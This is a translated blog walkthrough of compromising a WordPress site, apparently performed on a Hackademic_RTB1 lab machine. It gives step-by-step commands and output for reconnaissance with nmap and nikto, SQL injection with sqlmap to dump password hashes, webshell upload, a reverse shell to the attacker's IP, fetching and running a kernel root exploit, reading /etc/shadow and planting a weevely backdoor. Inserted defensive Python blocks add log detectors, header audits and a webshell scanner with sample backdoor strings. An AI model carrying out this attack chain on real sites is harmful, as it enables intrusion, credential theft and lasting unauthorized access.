This question is difficult to answer; simply put, there are many ways to break into a website. The purpose of this article is to demonstrate the techniques that hackers commonly use to scan and break into websites.
Suppose your site is: hashlinux.com
Let's ping this server:
We got an IP address: 173.236.138.113. This is the IP address of our target server.
Sameip.org can help us find the other domains hosted on this server ("Sites hosted on IP address 173.236.138.113"):
There are 26 sites on this server (173.236.138.113). Many hackers will attack a different site on the same server in order to get into yours, but for the purposes of learning we will only go after your server.
We need to gather the following information about your site:
1. DNS records (A, NS, TXT, MX and SOA)
2. Type of web server (Apache, IIS, Tomcat)
3. Domain name registration information (which company owns this domain name)
4. Your name, address, email and phone number
5. The type of script running on your website (php, asp, asp.net, jsp, cfm)
6. Type of operating system of the server (Unix, Linux, Windows, Solaris)
7. Ports open on the server (80, 443, 21, etc.)
Now let's look up the DNS records for the site; we use the site who.is for this.
We found that the DNS records on the site were:
Let's check the type of Web server:
We can see that the website server is using Apache. We'll check the Apache version later.
hashlinux.com site information
IP: 173.236.138.113
Website status: active
Server type: Apache
Alexa trend/rank: 1 month: 3,213,968; 3 month: 2,161,753
Page views per visit: 1 month: 2.0; 3 month: 3.7
Next we look for the domain name registration information:
This gives us the registrant and other important information. We can use WhatWeb to detect which scripting language your site is using, as well as the operating system type and the web server version.
We can see that the website is using WordPress, the operating system is Fedora Linux and the web server is Apache 2.2.15. Now let's check which ports are open on the server:
We use Nmap:
1. Detect which services are running on the server:
/# nmap -sV hashlinux.com
Starting Nmap 5.59beta1 (http://nmap.org) at 2011-12-28 06:39
Nmap scan report for hashlinux.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 (Fedora)
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2. Detecting the server's OS
/# nmap -O hashlinux.com
Starting Nmap 5.59beta1 (http://nmap.org) at 2011-12-28 06:40
Nmap scan report for hashlinux.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
The server only has port 80 open, and the operating system is Linux 2.6.22 (Fedora Core 6).
Now that we have all the important information, let's do some vulnerability testing: SQL injection, blind SQL injection, LFI, RFI, XSS, CSRF and so on.
We use nikto.pl to gather information and find weaknesses:
/pentest/web/nikto# perl nikto.pl -h http://hashlinux.com
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.1.2
+ Target Hostname:    hashlinux.com
+ Target Port:        80
+ Start Time:         2011-12-29 06:50:03
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time:           2011-12-29 06:50:37 (seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
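As an added example that is not part of the original article: a small Python audit of the three nikto findings above (TRACE allowed, version in the Server banner, inode-leaking ETag) against a constructed set of response headers. The ETag value is built from the inode and size nikto reported, and the remediations are the standard Apache directives for each finding.

```python
import re

# Constructed response headers, modelled on what nikto reported above.
# Apache's default ETag is "inode-size-mtime" in hex: 12748 = 0x31cc, 1475 = 0x5c3.
SAMPLE_HEADERS = {
    "Server": "Apache/2.2.15 (Fedora)",
    "Allow": "GET,HEAD,POST,OPTIONS,TRACE",
    "ETag": '"31cc-5c3-4996d177f5c3b"',
}

_ETAG_RE = re.compile(r'^(?:W/)?"?([0-9a-f]+)-([0-9a-f]+)-([0-9a-f]+)"?$', re.I)


def decode_apache_etag(etag):
    """Decode an Apache inode-size-mtime ETag.
    Returns (inode, size, mtime_hex), or None when the value has another shape."""
    m = _ETAG_RE.match(etag.strip())
    if not m:
        return None
    inode, size, mtime = m.groups()
    return int(inode, 16), int(size, 16), mtime


def audit_headers(headers):
    """Return [(finding, remediation)] for the weaknesses nikto flagged."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    methods = {m.strip().upper() for m in h.get("allow", "").split(",")}
    if "TRACE" in methods:
        findings.append(("trace_enabled", "TRACE allowed (XST); set 'TraceEnable off'"))
    server = h.get("server", "")
    if re.search(r"/\d", server):  # a version number after the product name
        findings.append(("version_disclosure", f"banner '{server}'; set 'ServerTokens Prod'"))
    decoded = decode_apache_etag(h.get("etag", ""))
    if decoded:
        inode, size, _ = decoded
        findings.append(("etag_inode_leak",
                         f"ETag leaks inode {inode}, size {size}; set 'FileETag MTime Size'"))
    return findings
```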
You can also use w3af, a tool that ships with BackTrack 5 R1:
/pentest/web/w3af# ./w3af_gui
Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0
w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
We can insert the URL and select the full audit option:
Wait a moment and the results will appear.
There are SQL injection vulnerabilities and other vulnerabilities in the Web site.
Let's go deeper into the SQL injection:
http://hashlinux.com/Hackademic_RTB1/?cat=d%27z%220
This address is the injection point. We'll use sqlmap to dump all the database information needed for the intrusion:
sqlmap -u URL
Wait for a moment:
Select "N" to continue:
The injection is error-based, and the back-end database is MySQL 5.
Add the parameter "--dbs" to list all the databases:
We have found 3 databases:
Dump the tables of the WordPress database with "--dump -D wordpress --tables".
We need to export the "wp_users" table to get the user names and password hashes; then we can try to crack a password and finally log in to the WordPress admin backend.
Use the parameters "-T wp_users --columns":
22 columns of data were found:
Use the parameters "-C user_login,user_pass --dump" to export those columns.
This gives us the account name and its password hash.
Then use this website to convert the MD5 hash back to plaintext (not every hash can be reversed this way):
http://www.onlinehashcrack.com/free-hash-reverse.php
The plaintext password is: q1w2e3
User name "Georgemiller"
Let's log in to the WordPress admin backend:
Now let's try uploading a PHP Webshell to execute some Linux commands on this server.
Edit the WordPress "Textile" plugin: open it in the plugin editor, replace the real plugin code with a PHP webshell, and click Upload. The PHP webshell is now on the server.
Now the PHP webshell is running. We can browse all the files of the site, but we want root on the server so that we can go after the other sites too.
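From the defender's side, as an added example that is not from the original article: a detector run over constructed Apache access-log lines modelled on this chain (Nikto and sqlmap user agents, the TRACE probe, the ?cat=d%27z%220 injection point, and a direct hit on a freshly uploaded .php file under wp-content/plugins). The "direct plugin PHP" rule is a review heuristic, not proof of compromise, since some legitimate plugins are requested directly.

```python
import re
from urllib.parse import unquote

# Apache combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
SCANNER_UA = re.compile(r"nikto|sqlmap|w3af", re.I)
SQLI_PROBE = re.compile(r"""['"]|\bunion\b|\bselect\b|--""", re.I)
PLUGIN_PHP = re.compile(r"/wp-content/plugins/[^?]*\.php$", re.I)


def classify(line):
    """Return (ip, method, path, tags) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    tags = []
    if SCANNER_UA.search(f["ua"]):
        tags.append("scanner_ua")
    if f["method"].upper() == "TRACE":
        tags.append("trace_probe")
    path, _, query = f["path"].partition("?")
    if query and SQLI_PROBE.search(unquote(query)):  # decode %27 / %22 before matching
        tags.append("sqli_probe")
    if f["status"] == "200" and PLUGIN_PHP.search(path):
        tags.append("direct_plugin_php")  # heuristic: plugin files are normally included, not fetched
    return f["ip"], f["method"], f["path"], tags


def alerts(lines):
    """Only the parsed lines that carry at least one tag."""
    return [c for c in map(classify, lines) if c and c[3]]


# Constructed log lines modelled on the steps of this walkthrough (attacker at 192.168.1.6).
SAMPLE_LOG = [
    '192.168.1.6 - - [28/Dec/2011:06:50:03 -0500] "GET / HTTP/1.1" 200 1475 "-" "Mozilla/5.00 (Nikto/2.1.4)"',
    '192.168.1.6 - - [28/Dec/2011:06:50:05 -0500] "TRACE / HTTP/1.1" 200 0 "-" "Mozilla/5.00 (Nikto/2.1.4)"',
    '192.168.1.6 - - [28/Dec/2011:07:12:10 -0500] "GET /Hackademic_RTB1/?cat=d%27z%220 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '192.168.1.6 - - [28/Dec/2011:07:40:01 -0500] "GET /Hackademic_RTB1/wp-content/plugins/hax.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [28/Dec/2011:08:00:00 -0500] "GET /Hackademic_RTB1/?cat=3 HTTP/1.1" 200 6000 "-" "Mozilla/5.0"',
]
```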
Select "Back-connect" in the PHP webshell and connect to our IP "192.168.1.6" on port "5555".
Before clicking Connect, we must first start a listener on port 5555 on our own machine.
Click Connect and we'll get a window like this:
Let's try some Linux commands.
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/hackademic_rtb1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat 7 21:41:45 EST i686 i686 i386 GNU/Linux
The id command tells us the user ID and group.
The pwd command tells us where we are now.
The uname -a command gives system information including the kernel version.
So we now know that the server's kernel version is 2.6.31.5-127.fc12.i686.
We can find the exploit for this version in exploit-db.com.
Input: "Kernel 2.6.31"
The results above are not suitable because they are not privilege-escalation exploits. The next one is what we need:
http://www.exploit-db.com/exploits/15285
Copy this link:
http://www.exploit-db.com/download/15285
In the netcat shell, enter:
wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01--  http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02--  http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'
0K ...... 100% 29.7K=0.2s
We use the wget command to fetch the exploit from exploit-db.com; -O saves it under the name roro.c.
Note:
Most Linux kernel exploits are written in C, so we save the file with a .c suffix. Opening the source file shows the code directly:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include
#include
#include
#include <errno.h>
#include <string.h>
#include
#include
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
    int s, ret;
    struct sockaddr_in addr;
    s = socket(PF_RDS, SOCK_SEQPACKET, 0);
    if (s < 0) {
        printf("[*] Could not open socket.\n");
        exit(-1);
    }
    memset(&addr, 0, sizeof(addr));
All of the above shows that the exploit is written in C.
After saving the exploit on the server, we compile it into an ELF binary by typing:
gcc roro.c -o roro
Then execute the exploit:
./roro
[*] Linux kernel >= 2.6.30 RDS socket Exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses ...
[+] Resolved Rds_proto_ops to 0xe09f0b20
[+] Resolved Rds_ioctl to 0xe09db06a
[+] Resolved Commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] overwriting function pointer ...
[*] Triggering payload ...
[*] Restoring function pointer ...
id
At this point we already have root privileges:
uid=0(root) gid=0(root)
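As an added example, not from the article: a Python check of whether a uname -r string falls inside the range the exploit banner above states (kernel >= 2.6.30), plus the modprobe rule that stops the rds module from being auto-loaded when an unprivileged process opens a PF_RDS socket, which is what the exploit's prep_sock() relies on. The upper bound 2.6.36 is this example's assumption about where the upstream fix landed; distribution kernels backport fixes, so a package-level check is still required.

```python
import re


def parse_kernel_version(uname_r):
    """'2.6.31.5-127.fc12.i686' -> (2, 6, 31, 5); the part after '-' is the distro build."""
    base = uname_r.split("-", 1)[0]
    return tuple(int(p) for p in re.findall(r"\d+", base))


# Lower bound: the range printed by the exploit banner above ("kernel >= 2.6.30").
# Upper bound: assumption of this example (upstream fix in 2.6.36).
RDS_AFFECTED_MIN = (2, 6, 30)
RDS_FIXED = (2, 6, 36)


def rds_exposure(uname_r, rds_blocked=False):
    """Classify a host: version outside the range, in range but module blocked, or exposed."""
    v = parse_kernel_version(uname_r)
    if not (RDS_AFFECTED_MIN <= v < RDS_FIXED):
        return "outside_affected_range"
    return "rds_blocked" if rds_blocked else "exposed"


def modprobe_block_line(module="rds"):
    """Line for a file under /etc/modprobe.d/: 'install <mod> /bin/true' turns the
    auto-load triggered by socket(PF_RDS, ...) into a no-op instead of loading the module."""
    return f"install {module} /bin/true"


def modprobe_conf_blocks(conf_text, module="rds"):
    """True if a modprobe.d fragment already carries the install override.
    A plain 'blacklist' line is not counted: it does not stop an explicit modprobe."""
    pat = re.compile(rf"^\s*install\s+{re.escape(module)}\s+/bin/(true|false)\s*$", re.M)
    return pat.search(conf_text) is not None
```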
We can browse the /etc/shadow file:
cat /etc/shadow
Browse the /etc/passwd file:
cat /etc/passwd
We could use "John the Ripper" to crack the users' passwords, but we won't do that here.
Hackers need to leave a backdoor on the server for easy access later.
Here we use weevely to generate a small, password-protected PHP backdoor, which is then uploaded to the server to achieve this.
Weevely usage:
/pentest/backdoors/web/weevely# ./main.py -h
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Usage: main.py [options]
Options:
  -h, --help            show this help message and exit
  -g, --generate        Generate backdoor crypted code, requires -o and -p.
  -o OUTPUT, --output=OUTPUT
                        Output filename for generated backdoor.
  -c COMMAND, --command=COMMAND
                        Execute a single command and exit, requires -u and -p.
  -t, --terminal        Start a terminal-like session, requires -u and -p.
  -C CLUSTER, --cluster=CLUSTER
                        Start in cluster mode reading items from the given
                        file, in the form 'label,url,password' where label is
                        optional.
  -p PASSWORD, --password=PASSWORD
                        Password of the encrypted backdoor.
  -u URL, --url=URL     Remote backdoor URL.
Create a PHP backdoor with a password:
/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Backdoor file 'hax.php' created with password 'koko'.
Upload the PHP backdoor via the PHP webshell.
Once the upload is complete, we connect to it with this command:
/pentest/backdoors/web/weevely# ./main.py -t -u http://hashlinux.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method 'system()'.
+ Retrieving terminal basic environment variables.
[apache@HackademicRTB1 /var/www/html/hackademic_rtb1/wp-content/plugins]
Test our hax.php backdoor.
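As an added defensive example (not the article's own code): a triage scanner for PHP files in a plugins directory, looking for the indicators a dropped webshell or weevely-style backdoor leaves behind (eval of decoded data, a command-execution function fed from a request parameter, long opaque blobs). It runs over constructed samples: a benign plugin stub and two synthetic suspicious files; the patterns and thresholds are this example's choices, not weevely's actual output format.

```python
import base64
import re

# Indicator patterns (constructed for this example; tune them to your plugin set).
INDICATORS = {
    "eval_of_decoded_data": re.compile(
        r"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I),
    "exec_function": re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I),
    "request_input": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I),
    "opaque_blob": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}


def scan_php(source):
    """Return the indicator names that match one PHP source text."""
    return [name for name, pat in INDICATORS.items() if pat.search(source)]


def verdict(hits):
    """eval of decoded data, or an exec function combined with request input,
    is 'likely_webshell'; any other hit is 'review'; no hits is 'clean'."""
    if "eval_of_decoded_data" in hits or {"exec_function", "request_input"} <= set(hits):
        return "likely_webshell"
    return "review" if hits else "clean"


def triage(files):
    """Map file name -> verdict for a {name: source} dictionary."""
    return {name: verdict(scan_php(src)) for name, src in files.items()}


# Constructed samples (neither real plugin code nor a real backdoor).
_blob = base64.b64encode(b"constructed filler " * 16).decode()  # 408 chars of base64
SAMPLE_FILES = {
    "textile.php": "<?php\n/* Plugin Name: Textile */\n"
                   "function textile_filter($c) { return str_replace('*', '<b>', $c); }\n"
                   "add_filter('the_content', 'textile_filter');\n",
    "hax.php": "<?php eval(base64_decode('" + _blob + "'));\n",
    "cmd.php": "<?php system($_REQUEST['cmd']);\n",
}
```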
[via Infosecinstitute translation PPSBB]
This article is from the "lake and Laughter" blog, please make sure to keep this source http://hashlinux.blog.51cto.com/9647696/1793837
How hackers have hacked into your site